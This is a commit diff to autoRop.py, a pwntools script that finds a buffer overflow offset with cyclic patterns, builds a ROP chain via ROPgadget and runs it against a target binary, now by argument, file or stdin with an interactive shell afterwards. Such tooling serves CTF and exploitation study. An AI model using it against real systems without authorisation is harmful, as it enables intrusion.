interactive process but bad

autoRop.py

@@ -9,7 +9,8 @@ from contextlib import redirect_stderr
 
 from pwnlib.context import context
 from pwnlib.elf.corefile import Coredump
-from pwnlib.tubes.process import process, signal
+from pwnlib.tubes.process import process, signal, PTY
+from pwnlib import term
 from pwnlib.util.cyclic import cyclic, cyclic_find
 from pwnlib.util.packing import pack
 from pwnlib import atexit as pwnlibexit
@@ -39,6 +40,7 @@ arg_parser.add_argument("--rop_file", metavar="rop_file", default="rop.txt", typ
 arg_parser.add_argument("--rop_exec_file", metavar="rop_exec", default="rop_exec.json", type=str, help="The path to the file containing the command for the ROP to run")
 arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
 arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
+arg_parser.add_argument("--input_method", metavar="method", choices=['arg', 'file', 'stdin'], default='arg', help="Method of passing the payload to the target binary")
 arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
 
 args = arg_parser.parse_args()
@@ -49,23 +51,36 @@ rop_exec_file = args.rop_exec_file
 min_payload = args.min_payload
 max_payload = args.max_payload
 run = args.run
+input_method = args.input_method
+
+def run_program(exec_file: str, payload: str, mode: str, **kwargs):
+    p = None
+    if mode == 'arg':
+        p = process([f'./{exec_file}', payload], **kwargs)
+    elif mode == 'file':
+        with open('/tmp/input.txt', 'wb') as f:
+            f.write(payload)
+            f.flush()
+            p = process([f'./{exec_file}', '/tmp/input.txt'], **kwargs)
+    elif mode == 'stdin':
+        p = process([f'./{exec_file}'], **kwargs)
+        p.send(payload)
+    
+    return p
 
 def find_offset(exec_file: str, min_payload: int, max_payload: int):
     print("[ Find Offset Length ]")
 
-    input_file = "/tmp/input.txt"
-
     payload_size = min_payload
     while payload_size <= max_payload:
         
         print(f"  ├─[🤔] Trying payload {payload_size}...")
 
-        with open(input_file, "wb") as f:
+        payload = cyclic(payload_size)
-            payload = cyclic(payload_size)
+        proc = run_program(exec_file, payload, input_method, alarm=2)
-            f.write(payload)
-
-        proc = process([f"./{exec_file}", input_file])
         exit_code = proc.poll(block=True)
+        x = proc.readall()
+        print(x)
 
         if exit_code != 0:
             # ignore the warnings returned by pwnlib, if finding corefile fails then core is None
@@ -108,9 +123,12 @@ with open("log/ropgadget.log", "wb") as f:
 print(f"  └─[🤩] All done! The ROP input is saved to {rop_file}!")
 
 if run:
+    atexit.unregister(pwnlibexit._run_handlers)
     pwnlibexit._run_handlers()
 
     print()
     print(f"[ Run Program : ./{exec_file} {rop_file} ]")
-    os.execv(exec_file, [exec_file, rop_file])
+    with open(rop_file, 'rb') as f:
-    
+        term.init()
+        p = run_program(exec_file, f.read(), input_method)
+        p.interactive()